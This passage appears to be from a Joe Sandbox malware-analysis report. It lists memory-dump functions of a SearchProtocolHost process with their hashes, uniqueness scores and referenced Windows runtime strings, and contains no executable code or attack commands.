                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: Legacy$UEFI
                                                                                      • API String ID: 2994545307-634100481
                                                                                      • Opcode ID: 399d454f1fe606e75761249f483f008bb98e15ddd9001be7a62d3c5d5382c51d
                                                                                      • Instruction ID: fa791b1f136f931f4e107736460548c2eae223b391a83a8c11f7e8656a5b3c22
                                                                                      • Opcode Fuzzy Hash: 399d454f1fe606e75761249f483f008bb98e15ddd9001be7a62d3c5d5382c51d
                                                                                      • Instruction Fuzzy Hash: 45613F71A00B089FDB55DFE8CD50BAEB7B9FB44704F1448ADE549EB291E630E940CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • \Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\, xrefs: 0386B5C4
                                                                                      • RedirectedKey, xrefs: 0386B60E
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RedirectedKey$\Registry\Machine\System\CurrentControlSet\Control\CommonGlobUserSettings\
                                                                                      • API String ID: 0-1388552009
                                                                                      • Opcode ID: dce8a8173c1de299d8640dbc4f7cbd4ef21fb004ab24e775a3f570bf54bfcc41
                                                                                      • Instruction ID: fc1c1d3dd065938faaca5cb883c458e6d901b61313ade51a00a19d81c4c609bf
                                                                                      • Opcode Fuzzy Hash: dce8a8173c1de299d8640dbc4f7cbd4ef21fb004ab24e775a3f570bf54bfcc41
                                                                                      • Instruction Fuzzy Hash: 4761E5B5C00259EFDB11DFD5C888ADEBBB9FB48718F1480AAE505E7244E7349A49CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: $$$
                                                                                      • API String ID: 0-233714265
                                                                                      • Opcode ID: 48df672a847262f21cf7ade5c480bdcabc2c58033439ffa4ce63e268761a6152
                                                                                      • Instruction ID: 6f3afa17e083a7f6c1dd92b900950bb9086571fae7f1712ee4e6ef0623b014d0
                                                                                      • Opcode Fuzzy Hash: 48df672a847262f21cf7ade5c480bdcabc2c58033439ffa4ce63e268761a6152
                                                                                      • Instruction Fuzzy Hash: 9061BD75A01B49CFDB20EFA8C988BADF7F1BF84704F14426DD515AB680CB74A941DB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlpResUltimateFallbackInfo Exit, xrefs: 0379A229
                                                                                      • RtlpResUltimateFallbackInfo Enter, xrefs: 0379A21B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                      • API String ID: 0-2876891731
                                                                                      • Opcode ID: 25f456eb8e42edd13d48526d7978dc4fa5728093d57ed75a6956236f654a8769
                                                                                      • Instruction ID: c8218e7aba8901d8007041d0d038405139578997adbc8d70e311ea55dfddb9c3
                                                                                      • Opcode Fuzzy Hash: 25f456eb8e42edd13d48526d7978dc4fa5728093d57ed75a6956236f654a8769
                                                                                      • Instruction Fuzzy Hash: A541CC38A01644DFEB11CF99D854B6AB7B8FF85704F1846A6E900EF3A1E636D910DB11
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                                                                      • API String ID: 0-118005554
                                                                                      • Opcode ID: 9dc9175124003f1b961c5b24c2873eafdbb2a36c9659688ace324b5478713826
                                                                                      • Instruction ID: 73359ccf7a677d0b8f3ae3470785e0fa9fae298c7278d3781bab3f4d6cbe8552
                                                                                      • Opcode Fuzzy Hash: 9dc9175124003f1b961c5b24c2873eafdbb2a36c9659688ace324b5478713826
                                                                                      • Instruction Fuzzy Hash: C231D2392087509BE311DFA8D868B1AFBE4EFC5714F0804A9F854CB390EB74D945CB52
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: .Local\$@
                                                                                      • API String ID: 0-380025441
                                                                                      • Opcode ID: ebb36b50a0eae0beb188efeb56bc803c8f1a2c9d588531555b581cf16f62a6a5
                                                                                      • Instruction ID: 980f3f3e89b1559f3cb1b8e3e4c79886a06373582fb910b754ec33db263b1e51
                                                                                      • Opcode Fuzzy Hash: ebb36b50a0eae0beb188efeb56bc803c8f1a2c9d588531555b581cf16f62a6a5
                                                                                      • Instruction Fuzzy Hash: C731B07A518341AFEB20DF28C884A5BFBE8EB89754F04492EF99587250D638DD04DB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • RtlpInitializeAssemblyStorageMap, xrefs: 0380289A
                                                                                      • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 0380289F
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: RtlpInitializeAssemblyStorageMap$SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx
                                                                                      • API String ID: 0-2653619699
                                                                                      • Opcode ID: a13c4d1fe07c23437365b924eda18c642e49279ea0431215e22a8041d57a016f
                                                                                      • Instruction ID: b8e0f08bf126caee2b51315245972534f1eeb3504af4e07941c68d008557b101
                                                                                      • Opcode Fuzzy Hash: a13c4d1fe07c23437365b924eda18c642e49279ea0431215e22a8041d57a016f
                                                                                      • Instruction Fuzzy Hash: 7D112C76B10204BBF725CA88CC85F6BB6A8DB84710F28846DB904DB284D6B4DD0093A0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: MUI
                                                                                      • API String ID: 0-1339004836
                                                                                      • Opcode ID: 4744fcc53370546debecd6082df8be067da817ba283613bf071800abb3a86c2c
                                                                                      • Instruction ID: 64fec0b94c4dbf9408c13eeaab8640e386399180ea76e261bbe38268bcec8343
                                                                                      • Opcode Fuzzy Hash: 4744fcc53370546debecd6082df8be067da817ba283613bf071800abb3a86c2c
                                                                                      • Instruction Fuzzy Hash: BC824A75E002099FEF25CFA9E884BADF7B5FF48710F1882AAD859AB250D7309941DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: GlobalTags
                                                                                      • API String ID: 0-1106856819
                                                                                      • Opcode ID: 055af09bd04cfd402dfd5fa270237e060f5499f0f441a5aea1f98ede017caf9e
                                                                                      • Instruction ID: 36eed69cb581cf94d4937f0e537b4a34bd0260d1eb90613af3084ee8ab594847
                                                                                      • Opcode Fuzzy Hash: 055af09bd04cfd402dfd5fa270237e060f5499f0f441a5aea1f98ede017caf9e
                                                                                      • Instruction Fuzzy Hash: E0716D75E0021A9FDF68CFD8D9806ADBBB1FF48314F1881AEE805EB284E7318951CB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: ee2fb0b08b5b09b76123aa143fb8c8207c01fadec9492ae1b75352d6c3704fe8
                                                                                      • Instruction ID: 5c2f310794bd400d2e85dedc9cccf30d64ade9788ed0c5c8996e96cb13f7ffa3
                                                                                      • Opcode Fuzzy Hash: ee2fb0b08b5b09b76123aa143fb8c8207c01fadec9492ae1b75352d6c3704fe8
                                                                                      • Instruction Fuzzy Hash: 71614B75D00219AFEF21DF98D844BEEFBB8BF85710F14465EEA10A7250DB749901DBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: #%u
                                                                                      • API String ID: 0-232158463
                                                                                      • Opcode ID: e0d74279153e2112105e41a48601800c3b378dff4c2e132424efba7e060fc3d5
                                                                                      • Instruction ID: 1935aebb62ea096fe3a80fb1558ac2a641e14b3ce353df77cc52df9ed3736b71
                                                                                      • Opcode Fuzzy Hash: e0d74279153e2112105e41a48601800c3b378dff4c2e132424efba7e060fc3d5
                                                                                      • Instruction Fuzzy Hash: 49715B75A006099FDB15DFA9C984BAEB7F8FF48704F184169E901EB291EB34E941CB60
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: EXT-
                                                                                      • API String ID: 0-1948896318
                                                                                      • Opcode ID: 40bd098a179695918d61d26b9cb9de8ba91302515266e526ab96250642da047e
                                                                                      • Instruction ID: 9863f407f0f815ca25ee69c1fd79daf4e90514c82421eb287d20498f0c8ec97b
                                                                                      • Opcode Fuzzy Hash: 40bd098a179695918d61d26b9cb9de8ba91302515266e526ab96250642da047e
                                                                                      • Instruction Fuzzy Hash: 2941AE765187019BD720DA69C858B6FB7E8AFC8B14F040F2DF584EB580E774D904C7A2
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: @
                                                                                      • API String ID: 0-2766056989
                                                                                      • Opcode ID: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                      • Instruction ID: 04556505b1ee82cc18acac20776b2994e21493516697a04b48a78e8b131407ce
                                                                                      • Opcode Fuzzy Hash: c43e4f6ca914e096b0bb6f6f892f888bfe98aaa5ba337e83ae16dc3185e72182
                                                                                      • Instruction Fuzzy Hash: 8F519C75100750AFD321CF59C845A6BB7F8FF88710F008A2EFA959B6A0E7B4E904CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: BinaryHash
                                                                                      • API String ID: 2994545307-2202222882
                                                                                      • Opcode ID: 9e6bc1f878ad82e690f6cd08cad42c68247503daa08ef85e5ae410854764f267
                                                                                      • Instruction ID: 08b87e905ee672013f65a503db8b1e13390d3772f872bd9a526cbbc197a6421a
                                                                                      • Opcode Fuzzy Hash: 9e6bc1f878ad82e690f6cd08cad42c68247503daa08ef85e5ae410854764f267
                                                                                      • Instruction Fuzzy Hash: 544154B590062CABDB61DE94CC84FDEB77CAB44714F0046E5E609AF180DB709F898FA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: Flst
                                                                                      • API String ID: 0-2374792617
                                                                                      • Opcode ID: 31d80ed8b1097470384eba8725728cb081a9e2b376b2a5583c24858a5b363dc9
                                                                                      • Instruction ID: 8ff511558b4ceaf09977c7cfaf76ffbb70c54b49e243cc18cf51bc3bfad8293d
                                                                                      • Opcode Fuzzy Hash: 31d80ed8b1097470384eba8725728cb081a9e2b376b2a5583c24858a5b363dc9
                                                                                      • Instruction Fuzzy Hash: D841B7B4614301DFE354CF58C488A26FBE4EB89714F1885AEE499DF281D7B1C846CB92
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 35w35w
                                                                                      • API String ID: 0-3574678180
                                                                                      • Opcode ID: 835736914a86af7088b65a14e070a02a673f483a07f4cbbf8289de2d11517b12
                                                                                      • Instruction ID: e6be955801f7a2e22e55d1fde85a3a5dcd232a39c4370e427affca964b6e3d72
                                                                                      • Opcode Fuzzy Hash: 835736914a86af7088b65a14e070a02a673f483a07f4cbbf8289de2d11517b12
                                                                                      • Instruction Fuzzy Hash: D421B37A640B10AFC721EF68C444B2ABBB5EBC9B54F15086DA755AF741D770D900CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID: InitializeThunk
                                                                                      • String ID: BinaryName
                                                                                      • API String ID: 2994545307-215506332
                                                                                      • Opcode ID: ac3839a8249d783c6620a7c246cb14e0e881513c2866417d683f28112afb071b
                                                                                      • Instruction ID: 553f7b84ba256c2d82470ddfa5c9e864e93c3fd5b602a3a6c083fc29fa2bae28
                                                                                      • Opcode Fuzzy Hash: ac3839a8249d783c6620a7c246cb14e0e881513c2866417d683f28112afb071b
                                                                                      • Instruction Fuzzy Hash: 5731D4BA900619AFEB15DE9CCC45E6BB7B8EB80720F0546A9E901EF290D7309E00C790
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Strings
                                                                                      • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 038185DE
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmp
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                      • API String ID: 0-702105204
                                                                                      • Opcode ID: 67447ec8347fb165c2ce155f0305cee7d7a032feab8b1d73e1b30770b1bdb38d
                                                                                      • Instruction ID: 0b81231fad8b49b6e9de590e9fa9fe875f1bbf8c953a42fcc753450d6dc801c2
                                                                                      • Opcode Fuzzy Hash: 67447ec8347fb165c2ce155f0305cee7d7a032feab8b1d73e1b30770b1bdb38d
                                                                                      • Instruction Fuzzy Hash: 8C012B353107089FDA34FBE9D84DA6AB76EEF41664F0800E9E506CB552CF206860CB95
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: daee31316ed7e73db27b1a984a4309b5998f50179100564a27a048ef0e0da3fb
                                                                                      • Instruction ID: 0cd54446574832f180e85881837a3a2fbdbb08455e6060906268d3a36b016ea9
                                                                                      • Opcode Fuzzy Hash: daee31316ed7e73db27b1a984a4309b5998f50179100564a27a048ef0e0da3fb
                                                                                      • Instruction Fuzzy Hash: F8429175A006968FDB18CF59C8906AEF7B6FF8D314B18859DE952EB340D734E842CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 03f44466c0ab31493c35a5fb12c474d23d6f69a0de5a5230d1040cd9273f058f
                                                                                      • Instruction ID: 8fa41606e91d3be2596539536f1dcc57b923cd0984b88ef6d746dff48579ca59
                                                                                      • Opcode Fuzzy Hash: 03f44466c0ab31493c35a5fb12c474d23d6f69a0de5a5230d1040cd9273f058f
                                                                                      • Instruction Fuzzy Hash: 1B32DB34A00B588FDB24DFA9C8447BAFBF2BF84700F28456DE6469B784D735A942DB50
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4baf2ebb7743ccdfcb92a2980ab9a0ee927efc09fa17bb581268dd6ba6187c60
                                                                                      • Instruction ID: 777aff601d0625f73c0406d4b0a9ee0c2295d37ed076c3bc50d23b9601c17a07
                                                                                      • Opcode Fuzzy Hash: 4baf2ebb7743ccdfcb92a2980ab9a0ee927efc09fa17bb581268dd6ba6187c60
                                                                                      • Instruction Fuzzy Hash: EB227F35A002168FCF19CF99C494BBAF7F6BF88305F1885A9E855DB345DB34A942CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f13f80ca12b73ca84871a5e3994816466fc71f526c6fef2142e5436b3cd428ff
                                                                                      • Instruction ID: 06b33ba449c88d56f4d7b7c69073836c9d5e40bdfbf2ccdef465a83d5d08c8be
                                                                                      • Opcode Fuzzy Hash: f13f80ca12b73ca84871a5e3994816466fc71f526c6fef2142e5436b3cd428ff
                                                                                      • Instruction Fuzzy Hash: 98C1A275E002159FEF28DB58C844BAEF7B5FF44314F1882AAE925AB381D770E941CB90
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 141e8310cd64c4631e3d2a174db076b289d38b0877ddb9a774a3abd027ba1671
                                                                                      • Instruction ID: c36b3a3ecac7957b454f308386d5fb8c4aad92a85e12ac5c09379c2b7e986668
                                                                                      • Opcode Fuzzy Hash: 141e8310cd64c4631e3d2a174db076b289d38b0877ddb9a774a3abd027ba1671
                                                                                      • Instruction Fuzzy Hash: 35D11475A006049FDB91DFA8C984B9ABBF9BF49310F0841BAED09DF256D731D905CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
                                                                                      • Associated: 00000013.00000002.5796235553.0000000003889000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      • Associated: 00000013.00000002.5796235553.000000000388D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_19_2_3760000_SearchProtocolHost.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e9a899fecc5bbb9a685d876fe5b3be2a994b7d68d2124349a2ff11ec83a71241
                                                                                      • Instruction ID: 53554394ea0b33837f539b7fecdec8757c89a253804e0e97885e6c65082bd754
                                                                                      • Opcode Fuzzy Hash: e9a899fecc5bbb9a685d876fe5b3be2a994b7d68d2124349a2ff11ec83a71241
                                                                                      • Instruction Fuzzy Hash: BFC10472A05A20CBDB28DF1CCC907B9B7A5FBC8704F194299E942DF395E7348941CBA0
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Memory Dump Source
                                                                                      • Source File: 00000013.00000002.5796235553.0000000003760000.00000040.00001000.00020000.00000000.sdmp, Offset: 03760000, based on PE: true
